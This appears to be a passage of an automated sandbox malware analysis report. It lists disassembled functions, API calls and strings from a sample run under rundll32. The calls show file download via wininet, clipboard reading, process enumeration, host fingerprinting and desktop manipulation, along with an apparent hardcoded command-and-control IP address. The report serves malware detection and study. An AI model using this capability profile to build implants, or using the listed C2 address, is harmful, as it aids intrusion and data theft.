                    • LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 041738E4
                    • GetProcAddress.KERNEL32(00000000), ref: 041738E7
                    • LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 04173902
                    • GetProcAddress.KERNEL32(00000000), ref: 04173905
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Advapi32.dll$Allo$AndI$Chec$Free$Sid$aliz$cate$eSid$enMe$kTok$mber$niti$ship
                    • API String ID: 2574300362-3168299024
                    • Opcode ID: 6124132b63881c15215c2e24155f0c79fd467aa69bdbcff54966b4722bb96163
                    • Instruction ID: e5ebefb536e5a1e74d9ec5342735818825966d38019755621f813c42719c533d
                    • Opcode Fuzzy Hash: 6124132b63881c15215c2e24155f0c79fd467aa69bdbcff54966b4722bb96163
                    • Instruction Fuzzy Hash: D83100B2D0131CABDB00DFE9D985AEEBBB8FF08700F108159E505AB204DB745A05CFA5
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$_strrchrlstrcat$EnvironmentExpandStringswsprintf
                    • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                    • API String ID: 609515672-33419044
                    • Opcode ID: e1f365a35ccd30dd29d336cf8c2c01b4edaf317a23e07d2f0b97bc0145458752
                    • Instruction ID: 9b4f7ee45b9471d826129322a27748ad566004a468814344fe8e9685e39ad913
                    • Opcode Fuzzy Hash: e1f365a35ccd30dd29d336cf8c2c01b4edaf317a23e07d2f0b97bc0145458752
                    • Instruction Fuzzy Hash: CB51877198031C6BEB25DB64DDC5FEA77B99B04709F5040D8EA0AA61C0EBB4B788CF51
                    APIs
                    • DeleteFileA.KERNEL32(04175B63,00000000,00000001,?), ref: 04176FA9
                    • LoadLibraryA.KERNEL32(wininet.dll), ref: 04176FC2
                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 04176FD6
                    • FreeLibrary.KERNEL32(00000000), ref: 04176FF4
                    • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 04177013
                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04177046
                    • _memset.LIBCMT ref: 0417706E
                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0417707C
                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 041770B2
                    • CloseHandle.KERNEL32(?), ref: 041770C8
                    • Sleep.KERNEL32(00000001), ref: 041770D0
                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 041770DC
                    • FreeLibrary.KERNEL32(00000000), ref: 041770F1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$FileLibrary$Free$CloseCreateDeleteHandleLoadSleepWrite_memset
                    • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
                    • API String ID: 455779405-4269851202
                    • Opcode ID: a2820014e161eff43410e82ccdbf803a73a1d8402037898e6bb2e10c308b9cb3
                    • Instruction ID: 7d792645d74016ce2f911a013c7fb69a2bf88b5e7535cb047a96176c61078ea5
                    • Opcode Fuzzy Hash: a2820014e161eff43410e82ccdbf803a73a1d8402037898e6bb2e10c308b9cb3
                    • Instruction Fuzzy Hash: 4F4162F5A50218ABE7209BA59CC5FDA73BCEB88704F104199F705A7180DB746E858F68
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Version_memset_strncpy
                    • String ID: Unknown$Windows 10$Windows 2000$Windows 2008 R2$Windows 2012$Windows 2012 R2$Windows 2016$Windows 2019$Windows 7 SP1$Windows 8$Windows 8.1 Update 1$Windows Vista SP2$Windows XP
                    • API String ID: 1449955169-2950701659
                    • Opcode ID: a960d9b6c2a6a5b7220d3c8ad0341d8a5cbad15220432cfe681eb73ff584f3e0
                    • Instruction ID: 774354bdd06e4b115bbd9acf970170d3d797d4d4f3689d08e373ad58fbfe4d60
                    • Opcode Fuzzy Hash: a960d9b6c2a6a5b7220d3c8ad0341d8a5cbad15220432cfe681eb73ff584f3e0
                    • Instruction Fuzzy Hash: 0A311031B8831CA7EB3499608CC3F697670A700B08F5484D6ED2EE95C1EBA57984FE02
                    APIs
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 0417515F
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 04175179
                      • Part of subcall function 04175140: GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
                      • Part of subcall function 04175140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 041751C3
                      • Part of subcall function 04175140: wsprintfA.USER32 ref: 041751DB
                    • _memset.LIBCMT ref: 041768C6
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,Time), ref: 041768DC
                    • _strrchr.LIBCMT ref: 041768EB
                    • _strtok.LIBCMT ref: 041768F9
                    • wsprintfA.USER32 ref: 04176925
                    • CreateThread.KERNEL32(00000000,00000000,04176200,00000000,00000000,00000000), ref: 0417698F
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,Time), ref: 04176996
                    • _strtok.LIBCMT ref: 041769AA
                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,Time), ref: 041769C1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$Name_strtokwsprintf$CloseComputerCreateFileHandleModuleSleepThread_strrchrlstrcpy
                    • String ID: %s\%s$ARPD$Time
                    • API String ID: 2842694341-2065597383
                    • Opcode ID: 643eb0ef6b9faf268986163f48ab158adcf2ec63218d1f123866f11c51d10b07
                    • Instruction ID: b9937949a22cc001f62d8fb4f00b5d8cf3cd3587615ae4338f280f8cc2961256
                    • Opcode Fuzzy Hash: 643eb0ef6b9faf268986163f48ab158adcf2ec63218d1f123866f11c51d10b07
                    • Instruction Fuzzy Hash: A431E471A44314AFEB10AB64CC81FDB77B8EB44715F0441D4E949AB181EBB4BA88CFA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$_strrchr
                    • String ID: D
                    • API String ID: 3722325190-2746444292
                    • Opcode ID: 89c303740c1add9219757045c392371c27dadc62f405e1885f2600a688bbd819
                    • Instruction ID: a4ef4d8837fc4a46ecff2eeda056f4c6bc0ff979d30b993dfe99ddec5d10bce3
                    • Opcode Fuzzy Hash: 89c303740c1add9219757045c392371c27dadc62f405e1885f2600a688bbd819
                    • Instruction Fuzzy Hash: A751E7729443197BEF21EB648CC5FEA77B89B14705F4441C8E609AA1C0E770BB89CF91
                    APIs
                    • _memset.LIBCMT ref: 04175F62
                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04175F89
                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 04175FC6
                    • CloseHandle.KERNEL32(00000000), ref: 04175FD1
                    • wsprintfA.USER32 ref: 0417600D
                    • lstrcpyA.KERNEL32(00000000,?), ref: 04176026
                    • CreateThread.KERNEL32(00000000,00000000,Function_00015E80,00000000,00000000,00000000), ref: 04176067
                    • CloseHandle.KERNEL32(00000000), ref: 0417606E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: CloseCreateFileHandle$ThreadWrite_memsetlstrcpywsprintf
                    • String ID: %s %s
                    • API String ID: 3904585434-2939940506
                    • Opcode ID: d922e82382e9636fbddc5a32703a3012ac1b754c3eb7b61fd346200cbe31ca19
                    • Instruction ID: fcf704222ba29e76608dcd0c4906edd221597a4326a385a9ad531ae2317e9206
                    • Opcode Fuzzy Hash: d922e82382e9636fbddc5a32703a3012ac1b754c3eb7b61fd346200cbe31ca19
                    • Instruction Fuzzy Hash: 54410672A44318ABEB319B649C88FEA777CFB44714F0401D8F50AA6080DB757B89CF91
                    APIs
                    • _memset.LIBCMT ref: 0417706E
                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0417707C
                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 041770B2
                    • CloseHandle.KERNEL32(?), ref: 041770C8
                    • Sleep.KERNEL32(00000001), ref: 041770D0
                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 041770DC
                    • FreeLibrary.KERNEL32(00000000), ref: 041770F1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$CloseFileFreeHandleLibrarySleepWrite_memset
                    • String ID: InternetCloseHandle$InternetReadFile
                    • API String ID: 586530251-535091292
                    • Opcode ID: dc273fbbbdfabe85aeff23ed4e1d3783a3263076f8d12d80747c51631ba9c27c
                    • Instruction ID: 8fea42aa1be9bbc41055c967aab0d7bec6733a434082c43a0bb5f1781cba7aa4
                    • Opcode Fuzzy Hash: dc273fbbbdfabe85aeff23ed4e1d3783a3263076f8d12d80747c51631ba9c27c
                    • Instruction Fuzzy Hash: 9C1133F6550218ABDB20EBA4DC85FEEB37CEF84700F004188F705A7181DB786A868F65
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$ComputerNamelstrcpylstrlenwsprintf
                    • String ID: SOFTWARE\%s\$Time$UnKnow
                    • API String ID: 3529005902-722125974
                    • Opcode ID: ae35c05c3e8d2c150f232ef70d304dc38baf5d4b6739b142e1f0230638ac572b
                    • Instruction ID: d2a54a0a9bdf7156e4a5a9024703edffe4ccef0fa01b4e7ea41109bbdc6fa36f
                    • Opcode Fuzzy Hash: ae35c05c3e8d2c150f232ef70d304dc38baf5d4b6739b142e1f0230638ac572b
                    • Instruction Fuzzy Hash: D51194B1990208ABE720EB64DC49F9A737CEB44704F0040D8E609A2081EB756AA8CBA0
                    APIs
                    • LoadLibraryA.KERNEL32(user32.dll,161FA605), ref: 041735F5
                    • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 0417360C
                    • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 04173616
                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 0417361E
                      • Part of subcall function 04173370: LoadLibraryA.KERNEL32(user32.dll,161FA605), ref: 041733BA
                      • Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 041733D0
                      • Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 041733DE
                      • Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 041733EC
                      • Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 041733FA
                      • Part of subcall function 04173370: LoadLibraryA.KERNEL32(kernel32.dll), ref: 04173407
                      • Part of subcall function 04173370: GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 04173417
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                    • API String ID: 2238633743-3711086354
                    • Opcode ID: b9606598ad8b805cd091e2c72aaa1982394d60e3ac438c82a32fdb5d6e4015c0
                    • Instruction ID: 356b9397244eeb16e43cf693729ced6052f44717c9644e5b7f856eb0b1a063fc
                    • Opcode Fuzzy Hash: b9606598ad8b805cd091e2c72aaa1982394d60e3ac438c82a32fdb5d6e4015c0
                    • Instruction Fuzzy Hash: 3F118671A44318ABD7109FA99CC5B9FBBF8FB45654F10012AF915E7380DB7479008E65
                    APIs
                    • _memset.LIBCMT ref: 0419361C
                    • _strncpy.LIBCMT ref: 04193639
                      • Part of subcall function 041943F8: _memset.LIBCMT ref: 04194417
                      • Part of subcall function 041943F8: _memset.LIBCMT ref: 04194431
                      • Part of subcall function 041943F8: _memset.LIBCMT ref: 0419447B
                    • _strncpy.LIBCMT ref: 04193684
                    • _strncpy.LIBCMT ref: 0419374E
                    • _strncpy.LIBCMT ref: 04193765
                    • _strncpy.LIBCMT ref: 041937D9
                    • _strncpy.LIBCMT ref: 04193820
                    • _memset.LIBCMT ref: 0419383D
                    • _strncpy.LIBCMT ref: 04193888
                      • Part of subcall function 04181058: std::_Xinvalid_argument.LIBCPMT ref: 0418106E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _strncpy$_memset$Xinvalid_argumentstd::_
                    • String ID:
                    • API String ID: 3894514434-0
                    • Opcode ID: 1741034cf7b41852be961f9bdc50938c924f20bd8ca339661be4e5add2ae981d
                    • Instruction ID: 936218522b196335e23bd80db3d4ccf93fbd9ad5bdc91d1adac41037c1ad9319
                    • Opcode Fuzzy Hash: 1741034cf7b41852be961f9bdc50938c924f20bd8ca339661be4e5add2ae981d
                    • Instruction Fuzzy Hash: 4781FCB2D002286BEF25EB648CC5BED77B8EB58300F4446D9E919A7240DB34AF45CF95
                    APIs
                      • Part of subcall function 041629FE: _malloc.LIBCMT ref: 04162A18
                    • _memset.LIBCMT ref: 04176668
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04176759
                    • CreateThread.KERNEL32(00000000,00000000,Function_00013690,Function_00016200,00000000,00000000), ref: 04176779
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0417678A
                    • CloseHandle.KERNEL32(?), ref: 04176797
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016200,00000000,00000000,00000000), ref: 04176845
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Create$Thread$CloseEventHandleObjectSingleWait_malloc_memset
                    • String ID: yxxx
                    • API String ID: 3710809023-3567846162
                    • Opcode ID: fb886a17815d051c32206671f2c6bc07212c778915a2b68ec02ca96868befb8a
                    • Instruction ID: 39e03d670faedb1a521eda84ce08c7f772ebd1d93ebfce84fc09ec383acac6f4
                    • Opcode Fuzzy Hash: fb886a17815d051c32206671f2c6bc07212c778915a2b68ec02ca96868befb8a
                    • Instruction Fuzzy Hash: 30610771E002189BDB24DF64CCC1BD9B7B5EB48314F0441E9EA49AB381DB75BE94CB90
                    APIs
                    • _memset.LIBCMT ref: 04173F0C
                    • _memset.LIBCMT ref: 04173F1D
                      • Part of subcall function 04174D60: _memset.LIBCMT ref: 04174DC6
                      • Part of subcall function 04174D60: _memset.LIBCMT ref: 04174DD9
                      • Part of subcall function 04174D60: _memset.LIBCMT ref: 04174DEC
                      • Part of subcall function 04174D60: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,161FA605,?,Enable,?), ref: 04174DF9
                      • Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04174E13
                      • Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04174E21
                      • Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 04174E2F
                      • Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 04174E37
                      • Part of subcall function 04174D60: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04174E3F
                      • Part of subcall function 04174D60: RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,?,?,?,161FA605,?,Enable,?), ref: 04174E6C
                      • Part of subcall function 04174D60: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,161FA605,?,Enable,?), ref: 04175003
                    • lstrlenA.KERNEL32(00000000), ref: 04173F44
                    • lstrcpyA.KERNEL32(041A8138,UnKnow), ref: 04173F5E
                    Strings
                    • ProcessorNameString, xrefs: 04173F26
                    • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 04173F33
                    • UnKnow, xrefs: 04173F54
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc_memset$Library$FreeLoadOpenlstrcpylstrlen
                    • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$UnKnow
                    • API String ID: 91903147-1449962935
                    • Opcode ID: 0967e0c508ca2739266bd997467659e941e0e2c99ba40870ba967ab8eb2bef04
                    • Instruction ID: a2ffcbd5c86852f6968e4a9a651cb1457da706161c691bf9c46ade2173993e69
                    • Opcode Fuzzy Hash: 0967e0c508ca2739266bd997467659e941e0e2c99ba40870ba967ab8eb2bef04
                    • Instruction Fuzzy Hash: 5D01867479430CABF710EBE58DC6F5D7374EB44B48F604058B6067A1C4EBB4BA28CA56
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 041737EC
                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 04173807
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04173811
                    • FreeLibrary.KERNEL32(00000000), ref: 04173825
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryProc$FreeLoad
                    • String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
                    • API String ID: 2256533930-2522683910
                    • Opcode ID: 7cd54fa6234d568c269d4e3bbaa5e7ecba65da4efa8355fd854b49c02efe820f
                    • Instruction ID: 492cac637e46fde83ecfaae8fe121d9d676d848432b6dae119fe9ef49b506047
                    • Opcode Fuzzy Hash: 7cd54fa6234d568c269d4e3bbaa5e7ecba65da4efa8355fd854b49c02efe820f
                    • Instruction Fuzzy Hash: 79F0EC7656531CBBE71097A5DC84DAFB77CDF49654B100155FC14932009B79BD0086F4
                    APIs
                    • OpenClipboard.USER32(00000000), ref: 041760AA
                    • GetClipboardData.USER32(00000001), ref: 041760BA
                    • GlobalLock.KERNEL32(00000000), ref: 041760C4
                    • GlobalUnlock.KERNEL32(?), ref: 04176193
                    • CloseClipboard.USER32 ref: 04176199
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                    • String ID: NULL
                    • API String ID: 1006321803-324932091
                    • Opcode ID: db37cb9c9ad9b0bd1dc07498729a9cd9ecd114de25c1ccad55f0e39ff46c2166
                    • Instruction ID: f9152ff4709463e059349f44edbebc12b02e8cd15665a61500f72a3da8037afc
                    • Opcode Fuzzy Hash: db37cb9c9ad9b0bd1dc07498729a9cd9ecd114de25c1ccad55f0e39ff46c2166
                    • Instruction Fuzzy Hash: 683104B5908245AFD701DF789898EDA7BF9DF85294B19C1A4E88AC7301EB34E60CC790
                    APIs
                      • Part of subcall function 041629FE: _malloc.LIBCMT ref: 04162A18
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 0417515F
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 04175179
                      • Part of subcall function 04175140: GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
                      • Part of subcall function 04175140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 041751C3
                      • Part of subcall function 04175140: wsprintfA.USER32 ref: 041751DB
                    • wsprintfA.USER32 ref: 04173E84
                    • lstrcpyA.KERNEL32(00000004,---+++***bbb,04174A7C), ref: 04173EAF
                    • lstrcpyA.KERNEL32(00000004,81.31.208.36,04174A7C), ref: 04173ECD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memsetlstrcpy$wsprintf$ComputerName_malloc
                    • String ID: ---+++***bbb$81.31.208.36$CopyC$Time
                    • API String ID: 98932487-3096327760
                    • Opcode ID: d3e80be16ef65f39f9a9a24a037f5b882fe32e559b0e7a54b7af3c72054d5371
                    • Instruction ID: 882999b4c48fdcabccf271f2a6f59da54bdd799f7b9542cc1ae051d963d50725
                    • Opcode Fuzzy Hash: d3e80be16ef65f39f9a9a24a037f5b882fe32e559b0e7a54b7af3c72054d5371
                    • Instruction Fuzzy Hash: 1F21AD767002159BD300CF19E888BD677B9FB88315F1441A9ED49C7200EF35B81CCB91
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,041A6A00,00000000,?,?,04173FFE), ref: 04173501
                      • Part of subcall function 041629FE: _malloc.LIBCMT ref: 04162A18
                    • Process32First.KERNEL32(00000000,00000000), ref: 0417352A
                    • lstrcmpiA.KERNEL32(00000024,?), ref: 0417353D
                    • CloseHandle.KERNEL32(00000000), ref: 04173585
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32_malloclstrcmpi
                    • String ID:
                    • API String ID: 2970433402-0
                    • Opcode ID: 95b6815ed8d5365b76ca7bee348bd75fef52bef4b13260e80015783988f30b0a
